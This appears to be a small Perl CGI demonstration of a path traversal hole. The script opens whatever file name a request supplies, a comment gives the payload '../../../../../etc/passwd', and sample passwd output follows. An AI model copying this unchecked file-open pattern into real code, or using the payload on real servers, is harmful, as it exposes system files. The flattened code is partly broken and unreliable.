#!/usr/local/bin/perl -w use CGI; use strict; my $q = new CGI; my $p = $q->Vars; local $/ = undef; my $file = $p->{file}; # ?file=doc1.txt <-- Должно open F, $file or die $!; # ../../../../../etc/passwd <-- Хек my $data = ; close F; print $q->header, $q->start_html, $q->h1($data), $q->end_html; #....................... # # # #

root:x:0:0:root:/root:/bin/bash #bin:x:1:1:bin:/bin:/bin/false #daemon:x:2:2:daemon:/sbin:/bin/false #mail:x:8:12:mail:/var/spool/mail:/bin/false #ftp:x:14:11:ftp:/srv/ftp:/bin/false #http:x:33:33:http:/srv/http:/bin/false #nobody:x:99:99:nobody:/:/bin/false #dbus:x:81:81:System message bus:/:/bin/false #policykit:x:102:101:PolicyKit:/:/sbin/nologin #hal:x:82:82:HAL daemon:/:/bin/false #ryuk:x:1000:100:Dima,Rubalko,,:/home/ryuk:/bin/zsh #avahi:x:84:84:Avahi daemon:/:/bin/false #

# #% #[~/src/perl/test]-» #23:28